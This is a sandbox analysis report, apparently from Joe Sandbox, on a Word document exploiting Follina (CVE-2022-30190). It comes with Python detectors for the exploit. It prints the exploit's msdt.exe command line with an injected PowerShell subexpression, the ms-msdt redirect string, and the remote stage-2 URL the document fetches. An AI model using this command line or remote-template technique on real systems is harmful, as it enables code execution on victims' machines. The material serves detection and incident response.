
Windows Analysis Report
icRTA4gcSe.docx

Overview

General Information

Sample Name: icRTA4gcSe.docx
Analysis ID: 685945
MD5: 9873ccaccab0237bf533324f69dff3b3
SHA1: 29d098d9ddf7e425413817089beb2eb14c91bc64
SHA256: 05625644a2e070d4780822daf7126f408ec0db9881a9995dc24ee500b624a198

Detection

Follina CVE-2022-30190
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Antivirus detection for dropped file
Detected suspicious Microsoft Office reference URL
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 5740 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 5992 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 5556 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • csc.exe (PID: 7104 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5pliokiz\5pliokiz.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 2008 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES329A.tmp" "c:\Users\user\AppData\Local\Temp\5pliokiz\CSCEC77468AE1504898A4CAD2F9B69D7F46.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 3228 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\h34ip5a5\h34ip5a5.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 5020 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES48B3.tmp" "c:\Users\user\AppData\Local\Temp\h34ip5a5\CSC3AC1B580675E4658855F5C63BDA7A47F.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • calc.exe (PID: 1648 cmdline: "C:\Windows\system32\calc.exe" MD5: 0975EE4BD09E87C94861F69E4AA44B7A)
  • Calculator.exe (PID: 3020 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca MD5: 79DAE866D55C1BA452E1B19721F67C1F)
  • csc.exe (PID: 5640 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v2wr4cux\v2wr4cux.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 6760 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEE6.tmp" "c:\Users\user\AppData\Local\Temp\v2wr4cux\CSCB2D03E94AB5B4EC2978640D7F4BF95DE.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
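The msdt.exe command line recorded under WINWORD.EXE in the tree above is the whole exploit chain in one string: Word resolves the external oleObject, MSHTML renders the fetched HTML, and its `location.href = "ms-msdt:..."` redirect hands the PCWDiagnostic troubleshooter an IT_BrowseForFile value whose $( ) subexpression the troubleshooter's PowerShell script expands, which is why calc.exe appears as a sibling process. The Python below is an added example, not Joe Sandbox output or a Joe Sandbox rule: it scores process-creation events for that pattern and recovers the embedded PowerShell. The Office parent list and the score weights are assumptions; the first event reuses the command line from the report (leading quote normalised), the second is a constructed benign troubleshooter launch.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Office binaries that should never be the parent of msdt.exe (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                  "msaccess.exe", "mspub.exe", "visio.exe"}


@dataclass
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_image: str


@dataclass
class Verdict:
    pid: int
    score: int = 0
    reasons: List[str] = field(default_factory=list)
    payload: Optional[str] = None   # PowerShell recovered from IT_BrowseForFile


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def extract_browseforfile_payload(cmdline: str) -> Optional[str]:
    """Body of the first $( ... ) inside IT_BrowseForFile=, tracking nested
    parentheses so Start-Process('calc') comes back intact."""
    m = re.search(r"IT_BrowseForFile=[^ ]*?\$\(", cmdline)
    if not m:
        return None
    depth, start = 1, m.end()
    for i in range(start, len(cmdline)):
        if cmdline[i] == "(":
            depth += 1
        elif cmdline[i] == ")":
            depth -= 1
            if depth == 0:
                return cmdline[start:i]
    return None                      # unbalanced: treat as not recovered


def assess(ev: ProcEvent) -> Verdict:
    """Score one process-creation event. Weights are illustrative, not a vendor scale."""
    v = Verdict(pid=ev.pid)
    if _basename(ev.image) != "msdt.exe":
        return v
    cl = ev.cmdline
    parent = _basename(ev.parent_image)
    if parent in OFFICE_PARENTS:
        v.score += 50
        v.reasons.append(f"msdt.exe spawned by Office process {parent}")
    if "ms-msdt:" in cl.lower():
        v.score += 10
        v.reasons.append("ms-msdt: protocol handler invocation")
    if "IT_BrowseForFile=" in cl:
        v.score += 10
        v.reasons.append("PCWDiagnostic IT_BrowseForFile parameter supplied")
    payload = extract_browseforfile_payload(cl)
    if payload is not None:
        v.score += 30
        v.payload = payload
        v.reasons.append("PowerShell subexpression $() embedded in IT_BrowseForFile")
    if re.search(r"(?:[\\/]\.\.){3,}", cl):
        v.score += 10
        v.reasons.append("directory traversal in troubleshooter path")
    return v


# Constructed events: the first cmdline is the one from the process tree above,
# the second is a constructed benign troubleshooter launch from explorer.exe.
SAMPLE_EVENTS = [
    ProcEvent(5556, r"C:\Windows\system32\msdt.exe",
              r'"C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param '
              r'"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed '
              r"IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../"
              r'Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO"',
              r"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE"),
    ProcEvent(4242, r"C:\Windows\System32\msdt.exe",
              r'"C:\Windows\System32\msdt.exe" -id NetworkDiagnosticsWeb',
              r"C:\Windows\explorer.exe"),
]


def triage(events: List[ProcEvent], threshold: int = 80) -> List[Verdict]:
    """Verdicts at or above the alert threshold, highest score first."""
    hits = [v for v in (assess(e) for e in events) if v.score >= threshold]
    return sorted(hits, key=lambda v: v.score, reverse=True)


if __name__ == "__main__":
    for v in triage(SAMPLE_EVENTS):
        print(f"PID {v.pid} score={v.score} payload={v.payload!r}")
        for r in v.reasons:
            print("   -", r)
```

The parent check carries most of the weight on purpose: an ms-msdt: URI launched from a browser is abuse of the same handler, but msdt.exe under an Office process is the Follina signature proper, and the recovered payload is what an incident responder needs to know what actually ran.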
No configs have been found
Yara matches (extracted files) - Source / Rule / Description / Author / Strings

Source: document.xml.rels
Rule: SUSP_Doc_WordXMLRels_May22
Description: Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard, Wojciech Cieslak
Strings:
  • 0x39:$a1: <Relationships
  • 0x2e5:$a2: TargetMode="External"
  • 0x2dd:$x1: .html!

Source: document.xml.rels
Rule: INDICATOR_OLE_RemoteTemplate
Description: Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents
Author: ditekSHen
Strings:
  • 0x26e:$olerel: relationships/oleObject
  • 0x287:$target1: Target="http
  • 0x2e5:$mode: TargetMode="External
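Both rules above key on the same three attributes of one <Relationship> element in word/_rels/document.xml.rels: a Type ending in relationships/oleObject, TargetMode="External", and an http(s) Target, with the Follina-specific rule additionally requiring the trailing "!" that the report's extracted URL (...fb0f9c45-fb5f-4690-9815-e11a762d4739.html!) shows. The Python below is an added triage script, not a Joe Sandbox component and not the Yara rules themselves: it opens a .docx as a ZIP, parses that part with the standard library, and reports the same indicators structurally rather than by byte offset. The two relationship parts it is run against are constructed, and the hostname in them is a placeholder rather than the URL from the report.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import List

# OOXML package-relationship namespace and the part the Yara rules inspect.
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
RELS_PART = "word/_rels/document.xml.rels"
OLE_REL_SUFFIX = "/relationships/oleObject"


@dataclass
class Finding:
    rel_id: str
    rel_type: str
    target: str
    reasons: List[str] = field(default_factory=list)


def scan_docx_rels(docx_bytes: bytes) -> List[Finding]:
    """Flag oleObject relationships that point outside the package: external
    TargetMode, http(s) target, and (Follina variant) a target ending in '!'."""
    findings: List[Finding] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        if RELS_PART not in pkg.namelist():
            return findings          # no document rels part: nothing to inspect
        root = ET.fromstring(pkg.read(RELS_PART))
    for rel in root.iter(RELS_NS + "Relationship"):
        rel_type = rel.get("Type", "")
        target = rel.get("Target", "")
        if not (rel_type.endswith(OLE_REL_SUFFIX) and rel.get("TargetMode") == "External"):
            continue                 # hyperlinks and images are legitimately External
        reasons = ["external oleObject relationship"]
        if target.lower().startswith(("http://", "https://")):
            reasons.append("remote http(s) target")
        if target.endswith("!"):
            reasons.append("target ends in '!' (the .html! form used by Follina droppers)")
        findings.append(Finding(rel.get("Id", ""), rel_type, target, reasons))
    return findings


def is_follina_suspect(docx_bytes: bytes) -> bool:
    """True when some finding carries all three indicators."""
    return any(len(f.reasons) == 3 for f in scan_docx_rels(docx_bytes))


def build_docx(rels_xml: str) -> bytes:
    """Constructed minimal .docx: just enough ZIP parts for the scanner to run offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("word/document.xml", "<document/>")
        pkg.writestr(RELS_PART, rels_xml)
    return buf.getvalue()


# Constructed relationship parts. The hyperlink in the benign part is External too,
# which is why the scanner keys on the oleObject type and not on TargetMode alone.
BENIGN_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.invalid/" TargetMode="External"/>
</Relationships>"""

MALICIOUS_RELS = BENIGN_RELS.replace(
    "</Relationships>",
    '<Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
    'Target="https://example.invalid/stage2.html!" TargetMode="External"/>\n</Relationships>',
)

if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("malicious", MALICIOUS_RELS)):
        sample = build_docx(rels)
        print(label, "suspect" if is_follina_suspect(sample) else "clean")
        for f in scan_docx_rels(sample):
            print("  ", f.rel_id, f.target, "|", "; ".join(f.reasons))
```

Parsing the XML instead of grepping the bytes avoids the two easy evasions against offset-based string rules (attribute reordering and whitespace), while an external oleObject with an http target is still reported even when the "!" is absent, since remote OLE/template references are worth a look on their own.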
Yara matches (PCAP) - Source / Rule / Description / Author / Strings

Source: sslproxydump.pcap
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security
Yara matches (dropped files) - Source / Rule / Description / Author / Strings

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x198f:$a: PCWDiagnostic
  • 0x1983:$sa3: ms-msdt
  • 0x1a02:$sb3: IT_BrowseForFile=

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm
Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x1972:$re1: location.href = "ms-msdt:

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A694E5B.htm
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x198f:$a: PCWDiagnostic
  • 0x1983:$sa3: ms-msdt
  • 0x1a02:$sb3: IT_BrowseForFile=

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A694E5B.htm
Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x1972:$re1: location.href = "ms-msdt:

(4 further dropped-file entries not shown)
Yara matches (memory dumps) - Source / Rule / Description / Author / Strings

Source: 0000000C.00000002.568294017.0000000000A00000.00000004.00000020.00020000.00000000.sdmp
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x28b2:$a: PCWDiagnostic
  • 0x2888:$sa1: msdt.exe
  • 0x289a:$sa3: ms-msdt
  • 0x2994:$sb3: IT_BrowseForFile=

Source: 0000000C.00000002.568294017.0000000000A00000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security

Source: 0000000C.00000002.559095546.0000000000718000.00000004.00000020.00020000.00000000.sdmp
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x5f16:$a: PCWDiagnostic
  • 0xb6b6:$a: PCWDiagnostic
  • 0x17f2c:$a: PCWDiagnostic
  • 0x57b0:$sa1: msdt.exe
  • 0x1a8a6:$sa1: msdt.exe
  • 0x26b8:$sb3: IT_BrowseForFile=

Source: 0000000C.00000002.558367025.0000000000520000.00000004.00000020.00020000.00000000.sdmp
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x2338:$a: PCWDiagnostic
  • 0x22d0:$sa1: msdt.exe
  • 0x230c:$sa1: msdt.exe
  • 0x2568:$sa1: msdt.exe
  • 0x2320:$sa3: ms-msdt
  • 0x241c:$sb3: IT_BrowseForFile=

Source: 0000000C.00000002.558367025.0000000000520000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security

(3 further memory-dump entries not shown)
No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: icRTA4gcSe.docx | Virustotal: Detection: 47%
Source: icRTA4gcSe.docx | Metadefender: Detection: 28%
Source: icRTA4gcSe.docx | ReversingLabs: Detection: 61%
Source: icRTA4gcSe.docx | Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3903F105.htm | Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm | Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A694E5B.htm | Avira: detection malicious, Label: JS/CVE-2022-30190.G

Exploits

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 0000000C.00000002.568294017.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.558367025.0000000000520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.558856728.0000000000710000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A694E5B.htm, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3903F105.htm, type: DROPPED
Source: document.xml.rels | Extracted files from sample: https://sqdocs.s3.eu-west-2.amazonaws.com/fb0f9c45-fb5f-4690-9815-e11a762d4739.html!
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 52.95.148.198:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.95.143.42:443 -> 192.168.2.3:49749 version: TLS 1.2

Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\msdt.exe
Source: global traffic | DNS query: name: sqdocs.s3.eu-west-2.amazonaws.com (2 queries)
Source: global traffic | TCP traffic: 192.168.2.3 <-> 52.95.148.198:443, local ports 49746, 49747, 49748, 49752, 49753, 49754 (bidirectional; per-packet rows summarised)
Source: global traffic | TCP traffic: 192.168.2.3 <-> 52.95.143.42:443, local ports 49749, 49750, 49751, 49755, 49756, 49757, 49758 (bidirectional; per-packet rows summarised)
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49752 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49752 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49752 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49752 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49752 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49752 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49752 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49754 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49754 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49754 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49754 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49754 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49754 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49754 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: global trafficHTTP traffic detected: GET /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: sqdocs.s3.eu-west-2.amazonaws.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: sqdocs.s3.eu-west-2.amazonaws.comIf-Modified-Since: Sat, 28 May 2022 14:15:08 GMTIf-None-Match: "bfbfa8fdda62476690c9077946372eaa"Connection: Keep-Alive
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
